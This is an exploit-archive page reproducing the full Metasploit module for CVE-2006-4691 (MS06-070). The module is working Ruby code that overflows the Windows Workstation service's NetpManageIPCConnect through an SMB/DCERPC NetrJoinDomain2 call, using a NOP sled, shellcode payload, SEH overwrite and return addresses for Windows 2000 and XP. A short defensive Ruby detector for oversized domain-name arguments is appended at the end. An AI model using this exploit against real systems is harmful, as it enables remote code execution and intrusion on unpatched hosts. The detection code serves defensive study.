Microsoft Workstation Service NetpManageIPCConnect Overflow

Posted Dec 31, 2009
Authored by jduck | Site metasploit.com

This Metasploit module exploits a stack overflow in the NetApi32 NetpManageIPCConnect function via the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify the name of a valid Windows domain. It may be possible to satisfy this condition by using a custom DNS and LDAP setup, but that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code; Windows XP SP1 only requires valid user credentials. Testing also shows that a machine already joined to a domain is not exploitable.

tags | exploit, overflow
systems | windows
advisories | CVE-2006-4691
SHA-256 | ea9293c701b97bcc0c680f787edd7ae46789120c6798479e817b203688e6abb8

##
# $Id: ms06_070_wkssvc.rb 8023 2009-12-29 19:22:43Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Seh


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Workstation Service NetpManageIPCConnect Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect
				function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

					In order to exploit this vulnerability, you must specify the name of a
				valid Windows DOMAIN. It may be possible to satisfy this condition by using
				a custom dns and ldap setup, however that method is not covered here.

					Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
				credentials are required to reach the vulnerable code. Windows XP SP1 only
				requires valid user credentials. Also, testing shows that a machine already
				joined to a domain is not exploitable.
			},
			'Author'         =>
				[
					'jduck'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8023 $',
			'References'     =>
				[
					[ 'CVE', '2006-4691' ],
					[ 'OSVDB', '30263' ],
					[ 'BID', '20985' ],
					[ 'MSB', 'MS06-070' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic Targetting', { } ],
					[ 'Windows 2000 SP4',
						{
							'Offset' => (1058*2),
							'Ret'    => 0x75022ac4 # pop/pop/ret in ws2help.dll
						}
					],
					[ 'Windows XP SP0/SP1',
						{
							'Offset' => (1290*2),
							'Ret'    => 0x71ab21cd # pop/pop/ret in ws2_32.dll
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 14 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),
				# NOTE: a valid domain name is required. See description.
				OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
			], self.class)

	end

	def exploit

		connect()
		smb_login()

		# Resolve the target: either the one chosen explicitly or one picked
		# from the peer's reported OS version and pipe access behaviour.
		mytarget = nil
		if (target.name =~ /Automatic/)
			case smb_peer_os()
			when 'Windows 5.0'
				print_status("Detected a Windows 2000 target")
				mytarget = targets[1]
			when 'Windows 5.1'
				begin
					smb_create("\\SRVSVC")
					print_status("Detected a Windows XP SP0/SP1 target")
				rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
					if (e.error_code == 0xc0000022)
						raise RuntimeError, "Windows XP SP2 requires Administrator privileges!"
					end
					print_status("Detected a Windows XP target (unknown patch level)")
				end
				mytarget = targets[2]
			else
				raise RuntimeError, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}..."
			end
		else
			mytarget = target
		end

		# Workstation service (wkssvc) interface UUID, reached over the named pipe
		handle = dcerpc_handle(
			'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		print_status("Building the stub data...")

		distance = mytarget['Offset']
		hostname = make_nops(distance - payload.encoded.length)
		hostname << payload.encoded
		hostname << generate_seh_record(mytarget.ret)
		hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

		# The oversized value is carried in the DomainNameParam argument
		name = datastore['DOMAIN'] + "\\\\L"
		name = Rex::Text.to_unicode(name)
		name << hostname
		name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)
		name << "\x00\x00"

		# NetrJoinDomain2 arguments, in IDL order (see the notes at the end of the file)
		stub =
			NDR.uwstring("\\\\#{datastore['RHOST']}") +
			NDR.UnicodeConformantVaryingStringPreBuilt(name) +
			NDR.uwstring("") +
			NDR.uwstring("") +
			NDR.long(0) +
			NDR.long(1)

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x16, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end



=begin

The IDL for NetrJoinDomain2 looks like this:

long _NetrJoinDomain2@28 (
	[in][unique][string] wchar_t * arg_1,
	[in][string]         wchar_t * arg_2,
	[in][unique][string] wchar_t * arg_3,
	[in][unique][string] wchar_t * arg_4,
	[in][unique]         struct_C * arg_5,
	[in]                 long arg_6
);

The domain validation that must succeed before the vulnerable code is reached
proceeds as follows:


1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
2. <-- dns server - response including answer and additional record.
answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389
additional: IN.A address of whateverserver.DOMAIN
3. --> ldap server - baseObject query with filter/attributes:
- filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))
- attributes: AttributeDescriptionList: NetLogon
4. <-- ldap server - searchResDone success, attributes data
- PartialAttributeList netlogon - 1 item
- type 23, flags 0x1fd, domain GUID,
forest, domain, hostname, netbios domain, netbios hostname,
user, site, client site, version, lmtoken, nttoken
5. validated.

=end
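For defenders, the useful property of this request is structural: NetrJoinDomain2 carries its string arguments as NDR conformant varying wide strings, and the trigger is a DomainNameParam far longer than any DNS or NetBIOS name can be. The following Ruby is an added example (not part of the Metasploit module above) that parses that NDR layout from a captured opnum 0x16 stub and flags a request whose second string exceeds a length limit. The layout assumed is standard NDR (three little-endian uint32 counts in 16-bit characters, then UTF-16LE data padded to 4 bytes); the encoder, sample stubs, threshold and function names are this example's own constructions, not Metasploit's `NDR` helpers.

```ruby
# Added example: detect an oversized DomainNameParam in a NetrJoinDomain2 stub.
# Assumed NDR conformant varying wide-string layout:
#   uint32 max_count, uint32 offset, uint32 actual_count (little-endian, in
#   UTF-16 code units), then actual_count * 2 bytes of UTF-16LE, padded to 4.
# All sample data below is constructed for the example.

# Encoder used only to build the constructed samples (own code, not Rex::Encoder::NDR).
def ndr_uwstring(str)
  data  = (str + "\x00").encode('UTF-16LE').b
  count = data.bytesize / 2
  pad   = "\x00".b * ((4 - (data.bytesize & 3)) & 3)
  [count, 0, count].pack('VVV') + data + pad
end

def ndr_long(v)
  [v].pack('V')
end

# Parses one conformant varying wide string at byte offset +off+.
# Returns [decoded_text, actual_count, next_offset]. Inconsistent counts or a
# truncated buffer raise, which a parser facing hostile input must treat as a
# finding rather than silently skip.
def parse_ndr_uwstring(buf, off)
  raise ArgumentError, "truncated header at #{off}" if buf.bytesize < off + 12
  max_count, offset, actual = buf[off, 12].unpack('VVV')
  raise ArgumentError, "actual_count #{actual} > max_count #{max_count}" if actual > max_count
  raise ArgumentError, "non-zero offset #{offset}" unless offset.zero?
  data_len = actual * 2
  raise ArgumentError, "truncated data at #{off + 12}" if buf.bytesize < off + 12 + data_len
  data   = buf[off + 12, data_len]
  padded = (data_len + 3) & ~3
  text = data.force_encoding('UTF-16LE')
             .encode('UTF-8', invalid: :replace, undef: :replace)
             .delete("\x00")
  [text, actual, off + 12 + padded]
end

# Walks the first two arguments (ServerName, DomainNameParam) and reports whether
# DomainNameParam exceeds +limit+ code units. DNS names are capped at 255 octets,
# so the default of 256 already leaves headroom for any legitimate join request.
def oversized_join_request?(stub, limit = 256)
  _server, _n, off = parse_ndr_uwstring(stub, 0)
  _domain, n, _off = parse_ndr_uwstring(stub, off)
  n > limit
end

# Constructed samples: a benign join request and one carrying a 3000-character name.
BENIGN_STUB = ndr_uwstring("\\\\10.0.0.5") + ndr_uwstring("CORP.EXAMPLE\\OU") +
              ndr_uwstring("") + ndr_uwstring("") + ndr_long(0) + ndr_long(1)
LONG_STUB   = ndr_uwstring("\\\\10.0.0.5") + ndr_uwstring("A" * 3000) +
              ndr_uwstring("") + ndr_uwstring("") + ndr_long(0) + ndr_long(1)

if __FILE__ == $0
  puts "benign request flagged: #{oversized_join_request?(BENIGN_STUB)}"
  puts "long request flagged:   #{oversized_join_request?(LONG_STUB)}"
end
```

The same check works on the `[unique]` arguments if the caller first consumes the 4-byte referent ID that precedes each of them on the wire; the module above builds the stub without those IDs, so the parser here follows that layout. A rule keyed on the opnum (0x16) plus this length check is a narrower signal than a generic "long SMB write to \wkssvc" heuristic.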